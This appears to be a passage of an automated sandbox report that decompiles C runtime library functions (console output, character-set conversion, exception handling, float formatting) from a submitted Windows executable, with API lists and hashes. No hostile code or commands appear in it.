				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1249d38 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0x1249d38 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E0123830B(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0x1249d38 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0x1249d38 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1249d38 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E01237101( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E01237101();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 8)) - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E01232550(_t115, _v8 ^ _t131, _t128, _t129, _t130);
			}






































        0x0123d695
        0x0123d69c
        0x0123d69f
        0x0123d6a7
        0x0123d6ab
        0x0123d6b7
        0x0123d6ba
        0x0123d6bd
        0x0123d6c4
        0x0123d6cc
        0x0123d6cf
        0x0123d6d5
        0x0123d6db
        0x0123d6e0
        0x0123d6e2
        0x0123d6e5
        0x0123d6ea
        0x0123d6f4
        0x0123d6fb
        0x0123d6fe
        0x0123d705
        0x0123d70c
        0x0123d727
        0x0123d72f
        0x0123d738
        0x0123d75e
        0x0123d760
        0x00000000
        0x0123d73a
        0x0123d73d
        0x0123d804
        0x0123d810
        0x0123d81b
        0x0123d820
        0x0123d743
        0x0123d74a
        0x0123d74f
        0x0123d755
        0x0123d75b
        0x00000000
        0x0123d75b
        0x0123d755
        0x0123d73d
        0x0123d70e
        0x0123d712
        0x0123d715
        0x0123d71b
        0x0123d71d
        0x0123d720
        0x0123d724
        0x0123d761
        0x0123d764
        0x0123d765
        0x0123d76a
        0x0123d770
        0x0123d776
        0x0123d785
        0x0123d78b
        0x0123d791
        0x0123d796
        0x0123d7b2
        0x0123d825
        0x0123d82b
        0x0123d7b4
        0x0123d7bc
        0x0123d7c5
        0x0123d7cb
        0x00000000
        0x0123d7cd
        0x0123d7cf
        0x0123d7d2
        0x0123d7eb
        0x00000000
        0x0123d7ed
        0x0123d7f1
        0x0123d7f3
        0x0123d7f6
        0x00000000
        0x0123d7f6
        0x0123d7f1
        0x0123d7eb
        0x0123d7cb
        0x0123d7c5
        0x0123d7b2
        0x0123d796
        0x0123d770
        0x00000000
        0x0123d7f9
        0x0123d7f9
        0x0123d82d
        0x0123d83f

        APIs
        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0123DE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0123D6CF
        • __fassign.LIBCMT ref: 0123D74A
        • __fassign.LIBCMT ref: 0123D765
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0123D78B
        • WriteFile.KERNEL32(?,00000000,00000000,0123DE02,00000000,?,?,?,?,?,?,?,?,?,0123DE02,00000000), ref: 0123D7AA
        • WriteFile.KERNEL32(?,00000000,00000001,0123DE02,00000000,?,?,?,?,?,?,?,?,?,0123DE02,00000000), ref: 0123D7E3
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID:
        • API String ID: 1324828854-0
        • Opcode ID: 8c597bef3f668ddd229526b6db6abb7d8ddd3e323c2016eae0418da139308069
        • Instruction ID: 782569e766cd91b82caa4188d66d68fbf3ca2d873b20bf892692bda33f382d20
        • Opcode Fuzzy Hash: 8c597bef3f668ddd229526b6db6abb7d8ddd3e323c2016eae0418da139308069
        • Instruction Fuzzy Hash: 8351C3F5D102499FDB21CFA8E885BEEBBF9EF48300F14411AE655E7241E670A941CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123AC03, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
        Download Yara Rule
        C-Code - Quality: 71%
        			E0123AC03(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				void* _t80;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				void* _t98;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x1249004; // 0x5a4607f2
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E0123D349(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t98);
					_pop(_t103);
					_pop(_t80);
					return E01232550(_t80, _v8 ^ _t105, _t95, _t98, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E01239D68(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E01239575(_t81, _t85, _v12, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E01239D68(_t100);
									goto L36;
								}
								_t62 = E01239575(_t81, _t87, _t100, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E01239D68(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E01236508(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E012403C0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E01239575(_t81, 0, _t99, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E01236508(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E012403C0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}
































        0x0123ac08
        0x0123ac09
        0x0123ac0a
        0x0123ac11
        0x0123ac16
        0x0123ac1c
        0x0123ac22
        0x0123ac28
        0x0123ac2b
        0x0123ac2b
        0x0123ac2e
        0x0123ac30
        0x0123ac30
        0x0123ac2e
        0x0123ac32
        0x0123ac37
        0x0123ac3e
        0x0123ac41
        0x0123ac41
        0x0123ac5d
        0x0123ac63
        0x0123ac68
        0x0123adfb
        0x0123adfe
        0x0123adff
        0x0123ae00
        0x0123ae0e
        0x0123ac6e
        0x0123ac6e
        0x0123ac71
        0x0123ac76
        0x0123ac7a
        0x0123acce
        0x0123acce
        0x0123acd0
        0x0123acd2
        0x0123adf0
        0x0123adf0
        0x0123adf2
        0x0123adf3
        0x00000000
        0x0123adf9
        0x0123ace3
        0x0123ace9
        0x0123aceb
        0x00000000
        0x00000000
        0x0123acf1
        0x0123ad03
        0x0123ad08
        0x0123ad0c
        0x00000000
        0x00000000
        0x0123ad19
        0x0123ad53
        0x0123ad56
        0x0123ad59
        0x0123ad5b
        0x0123ad5d
        0x0123ad5f
        0x0123adab
        0x0123adab
        0x0123adad
        0x0123adad
        0x0123adaf
        0x0123ade9
        0x0123adea
        0x00000000
        0x0123adef
        0x0123adc3
        0x0123adc8
        0x0123adca
        0x00000000
        0x00000000
        0x0123adce
        0x0123adcf
        0x0123add0
        0x0123add3
        0x0123ae0f
        0x0123ae12
        0x0123add5
        0x0123add5
        0x0123add6
        0x0123add6
        0x0123ade3
        0x0123ade5
        0x0123ade7
        0x0123ae18
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0123ade7
        0x0123ad61
        0x0123ad64
        0x0123ad66
        0x0123ad68
        0x0123ad6a
        0x0123ad6d
        0x0123ad72
        0x0123ad8d
        0x0123ad8f
        0x0123ad99
        0x0123ad9b
        0x0123ad9c
        0x0123ad9e
        0x00000000
        0x00000000
        0x0123ada0
        0x0123ada6
        0x0123ada6
        0x00000000
        0x0123ada6
        0x0123ad74
        0x0123ad76
        0x0123ad7a
        0x0123ad7f
        0x0123ad81
        0x0123ad83
        0x00000000
        0x00000000
        0x0123ad85
        0x00000000
        0x0123ad85
        0x0123ad1b
        0x0123ad20
        0x00000000
        0x00000000
        0x0123ad26
        0x0123ad28
        0x00000000
        0x00000000
        0x0123ad3f
        0x0123ad44
        0x0123ad48
        0x00000000
        0x00000000
        0x00000000
        0x0123ad4e
        0x0123ac81
        0x0123ac83
        0x0123ac85
        0x0123ac8d
        0x0123acac
        0x0123acae
        0x0123acb8
        0x0123acba
        0x0123acbb
        0x0123acbd
        0x00000000
        0x00000000
        0x0123acc3
        0x0123acc9
        0x0123acc9
        0x00000000
        0x0123acc9
        0x0123ac91
        0x0123ac95
        0x0123ac9a
        0x0123ac9e
        0x00000000
        0x00000000
        0x0123aca4
        0x00000000
        0x0123aca4

        APIs
        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01234B06,01234B06,?,?,?,0123AE54,00000001,00000001,8AE85006), ref: 0123AC5D
        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0123AE54,00000001,00000001,8AE85006,?,?,?), ref: 0123ACE3
        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0123ADDD
        • __freea.LIBCMT ref: 0123ADEA
          • Part of subcall function 01236508: RtlAllocateHeap.NTDLL(00000000,?), ref: 0123653A
        • __freea.LIBCMT ref: 0123ADF3
        • __freea.LIBCMT ref: 0123AE18
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$AllocateHeap
        • String ID:
        • API String ID: 1414292761-0
        • Opcode ID: f5380be0d2c740c69e4a5810e1a011621c709317bcbc132c959fb891bd06a97e
        • Instruction ID: 4ed94de23ccfb3bbcbb30acdbec16ec9287e978c61ce9d8eac5b8b342500dbe9
        • Opcode Fuzzy Hash: f5380be0d2c740c69e4a5810e1a011621c709317bcbc132c959fb891bd06a97e
        • Instruction Fuzzy Hash: 0F51E3B262021BABEF258F68DC45EBB7BA9EF94610F144639FE45D7180EB74DC80C650
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01233220, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E01233220(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* _t48;
				char _t50;
				signed int _t56;
				intOrPtr _t57;
				void* _t58;
				intOrPtr _t61;
				char _t66;
				intOrPtr _t73;
				signed int _t76;
				char _t78;
				intOrPtr _t81;
				intOrPtr _t88;
				intOrPtr _t91;
				intOrPtr* _t93;
				void* _t97;
				void* _t99;
				void* _t107;

				_t84 = __edx;
				_push(__ebx);
				_t73 = _a8;
				_push(__esi);
				_push(__edi);
				_v5 = 0;
				_t91 = _t73 + 0x10;
				_v16 = 1;
				_v20 = _t91;
				_v12 =  *(_t73 + 8) ^  *0x1249004;
				_t48 = E012331E0(_t73, __edx, __edi, _t91,  *(_t73 + 8) ^  *0x1249004, _t91);
				_t88 = _a12;
				_push(_t88);
				E01233048(_t48);
				_t50 = _a4;
				_t99 = _t97 - 0x1c + 0xc;
				if(( *(_t50 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t73 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t73 + 0xc)) != 0xfffffffe) {
						_t84 = 0xfffffffe;
						E01233A07(_t73, 0xfffffffe, _t91, 0x1249004);
						goto L18;
					}
					goto L19;
				} else {
					_v32 = _t50;
					_v28 = _t88;
					_t88 =  *((intOrPtr*)(_t73 + 0xc));
					 *((intOrPtr*)(_t73 - 4)) =  &_v32;
					if(_t88 == 0xfffffffe) {
						L19:
						return _v16;
					} else {
						do {
							_t76 = _v12;
							_t19 = _t88 + 2; // 0x3
							_t56 = _t88 + _t19 * 2;
							_t73 =  *((intOrPtr*)(_t76 + _t56 * 4));
							_t57 = _t76 + _t56 * 4;
							_t77 =  *((intOrPtr*)(_t57 + 4));
							_v24 = _t57;
							if( *((intOrPtr*)(_t57 + 4)) == 0) {
								_t78 = _v5;
								goto L12;
							} else {
								_t84 = _t91;
								_t58 = E012339BE(_t77, _t91);
								_t78 = 1;
								_v5 = 1;
								_t107 = _t58;
								if(_t107 < 0) {
									_v16 = 0;
									L18:
									E012331E0(_t73, _t84, _t88, _t91, _v12, _t91);
									goto L19;
								} else {
									if(_t107 <= 0) {
										goto L12;
									} else {
										_t59 = _a4;
										if( *_a4 == 0xe06d7363) {
											_t109 =  *0x124a4ec;
											if( *0x124a4ec != 0) {
												_t59 = E01240080(_t109, 0x124a4ec);
												_t99 = _t99 + 4;
												if(_t59 != 0) {
													_t93 =  *0x124a4ec; // 0x0
													L01232E2E();
													_t59 =  *_t93(_a4, 1);
													_t91 = _v20;
													_t99 = _t99 + 8;
												}
											}
										}
										_t85 = _a4;
										E012339EE(_t59, _a8, _a4);
										_t61 = _a8;
										if( *((intOrPtr*)(_t61 + 0xc)) != _t88) {
											_t85 = _t88;
											E01233A07(_t61, _t88, _t91, 0x1249004);
											_t61 = _a8;
										}
										 *((intOrPtr*)(_t61 + 0xc)) = _t73;
										E012331E0(_t73, _t85, _t88, _t91, _v12, _t91);
										_t81 =  *((intOrPtr*)(_v24 + 8));
										E012339D5();
										asm("int3");
										E01233AF3();
										E01233865();
										if(E01233A88() != 0) {
											_t66 = E01233A3A(_t81, __eflags);
											__eflags = _t66;
											if(_t66 != 0) {
												E012331BB();
												return 1;
											} else {
												E01233AC4();
												goto L23;
											}
										} else {
											L23:
											return 0;
										}
									}
								}
							}
							goto L27;
							L12:
							_t88 = _t73;
							__eflags = _t73 - 0xfffffffe;
						} while (_t73 != 0xfffffffe);
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						}
						goto L19;
					}
				}
				L27:
			}



























        0x01233220
        0x01233226
        0x01233227
        0x0123322a
        0x0123322b
        0x0123322c
        0x01233233
        0x0123323e
        0x01233245
        0x01233248
        0x0123324b
        0x01233250
        0x01233253
        0x01233254
        0x01233259
        0x0123325c
        0x01233263
        0x0123331d
        0x01233321
        0x0123332b
        0x01233330
        0x00000000
        0x01233330
        0x00000000
        0x01233269
        0x01233269
        0x0123326f
        0x01233272
        0x01233275
        0x0123327b
        0x01233341
        0x0123334a
        0x01233281
        0x01233281
        0x01233281
        0x01233284
        0x01233287
        0x0123328a
        0x0123328d
        0x01233290
        0x01233293
        0x01233298
        0x01233300
        0x00000000
        0x0123329a
        0x0123329a
        0x0123329c
        0x012332a1
        0x012332a3
        0x012332a6
        0x012332a8
        0x01233314
        0x01233335
        0x01233339
        0x00000000
        0x012332aa
        0x012332aa
        0x00000000
        0x012332ac
        0x012332ac
        0x012332b5
        0x012332b7
        0x012332be
        0x012332c5
        0x012332ca
        0x012332cf
        0x012332d1
        0x012332de
        0x012332e3
        0x012332e5
        0x012332e8
        0x012332e8
        0x012332cf
        0x012332be
        0x012332eb
        0x012332f1
        0x012332f6
        0x012332fc
        0x01233351
        0x01233355
        0x0123335a
        0x0123335a
        0x01233361
        0x01233364
        0x01233371
        0x01233374
        0x01233379
        0x0123337a
        0x0123337f
        0x0123338b
        0x01233390
        0x01233395
        0x01233397
        0x012333a0
        0x012333a7
        0x01233399
        0x01233399
        0x00000000
        0x01233399
        0x0123338d
        0x0123338d
        0x0123338f
        0x0123338f
        0x0123338b
        0x012332aa
        0x012332a8
        0x00000000
        0x01233303
        0x01233303
        0x01233305
        0x01233305
        0x0123330e
        0x01233310
        0x00000000
        0x01233312
        0x00000000
        0x01233310
        0x0123327b
        0x00000000

        APIs
        • _ValidateLocalCookies.LIBCMT ref: 0123324B
        • __IsNonwritableInCurrentImage.LIBCMT ref: 012332C5
          • Part of subcall function 01240080: __FindPESection.LIBCMT ref: 012400D9
        • _ValidateLocalCookies.LIBCMT ref: 01233339
        • _ValidateLocalCookies.LIBCMT ref: 01233364
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
        • String ID: csm
        • API String ID: 1685366865-1018135373
        • Opcode ID: 587f050d5e9e5ed8548f77023ec246f3570ae8491bc372070f9034de83884fb5
        • Instruction ID: 04a055f177db600160ae42d984d60073c1f9f587454cd6fb34f52f6ed59878ca
        • Opcode Fuzzy Hash: 587f050d5e9e5ed8548f77023ec246f3570ae8491bc372070f9034de83884fb5
        • Instruction Fuzzy Hash: 1A41D270E2020AABCF10DF59C884AAEBFB5BF85228F14C055EA155B341DB72AB05CBD1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01235CE3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01235C94,00000000,?,01235C34,00000000,01247C68,0000000C,01235D8B,00000000,00000002), ref: 01235D03
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01235D16
        • FreeLibrary.KERNEL32(00000000,?,?,?,01235C94,00000000,?,01235C34,00000000,01247C68,0000000C,01235D8B,00000000,00000002), ref: 01235D39
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: fc64ef4078a8891ae1bdde75b158a0aaad95327ca559b6aedb47d7bc58554047
        • Instruction ID: 0d090e413749056e974e6965c2accffee55209884e33c17acc02e4596e8b131c
        • Opcode Fuzzy Hash: fc64ef4078a8891ae1bdde75b158a0aaad95327ca559b6aedb47d7bc58554047
        • Instruction Fuzzy Hash: B6F0687552021DFBDB155F96FC0DBAE7FB5EF54711F000058F90AA6154DB709A41CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123761B, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E0123761B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E01234161(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E012403A0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E012403A0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
